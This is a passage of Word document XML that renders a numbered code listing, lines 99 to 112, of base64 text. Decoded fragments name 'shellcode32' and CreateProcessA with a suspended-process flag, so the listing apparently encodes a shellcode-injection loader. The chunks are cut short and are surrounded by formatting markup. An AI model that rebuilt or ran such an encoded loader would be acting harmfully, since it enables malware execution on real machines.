,14931,2724,14935,2724,14938,2724,14942,2724,14946,2724,14950,2724,14953,2724,14957,2724,14961,2724,14966,2724,14970,2724,14974,2724,14978,2724,14983,2724,14987,2724,14992,2724,14997,2724,15002,2724,15006,2724,15011,2724,15016,2724,15022,2724,15027,2724,15032,2724,15038,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2724,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2723,15043,2722,15043,2722,15043,2722,15043,2722,15043,2722,15043,2722,15043,2721,15043,2721,15043,2721,15043,2721,15043,2720,15043,2720,15043,2720,15043,2719,15043,2719,15043,2719,15043,2718,15043,2718,15043,2717,15043,2717,15043,2716,15043,2716,15043,2716,15043,2715,15043,2714,15043,2714,15043,2713,15043,2713,15043,2712,15043,2712,15043,2711,15043,2710,15043,2709,15043,2709,15043,2708,15043,2707,15043,2706,15043,2706,15043,2705,15043,2704,15043,2703,15043,2702,15043,2701,15043,2700,15043,2699,15043,2698,15043,2697,15043,2696,15043,2695,15043,2694,15043,2693,15043,2691,15043,2690,15043,2689,15043,2688,15043,2686,15043,2685,15043,2684,15043,2682,15043,2681,15043,2679,15043,2678,15043,2676,15043,2675,15043,2673,15043,2671,15043,2670,15043,2668,15043,2666,15043,2664,15043,2663,15043,2661,15043,2659,15043,2657,15043,2655,15043,2653,15043,2651,15043,2649,15043,2647,15043,2644,15043,2642,15043,2640,15043,2638,15043,2635,15043,2633,15043,2631,15043,2628,15043,2626,15043,2623,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15043,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15042,2620,15041,2620,15041,2620,15041,2620,15041,2620,15040,2620,15040,2620,15040,2620,15039,2620,15039,2620,15038,2620,15038,2620,15037,2620,15037,2620,15036,2620,15036,2620,15035,2620,15035,2620,15034,2620,15033,2620,15033,2620,15032,2620,15031,2620,15030,2620,15030,2620,15029,2620,15028,2620,15027,2620,15026,2620,15025,2620,15024,2620,15023,2620,15021,2620,15020,2620,15019,2620,15018,2620,15016,2620,15015,2620,15013,2620,15012,2620,15010,2620,15009,2620,15007,2620,15006,2620,15004,2620,15002,2620,15000,2620,14998,2620,14996,2620,14994,2620,14992,2620,14990,2620,14988,2620,14986,2620,14983,2620,14981,2620,14979,2620,14976,2620,14974,2620,14971,2620,14968,2620,14966,2620,14963,2620,14960,2620,14957,2620,14954,2620,14951,2620,14948,2620,14945,2620,14941,2620,14938,2620,14934,2620,14931,2620,14927,2620,14924,2620,14920,2620,14916,2620,14912,2620,14908,2620,14904,2620,14900,2620,14896,2620,14892,2620,14887,2620,14883,2620,14878,2620,14874,2620,14869,2620,14864,2620,14859,2620,14854,2620,14849,2620,14844,2620,14839,2620,14834,2620,14828,2620,14823e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAE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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAt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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>J"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>QA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>J"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAm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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>u"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>107</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>N"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>109</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VUR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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>V9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>S"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>U"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPT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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
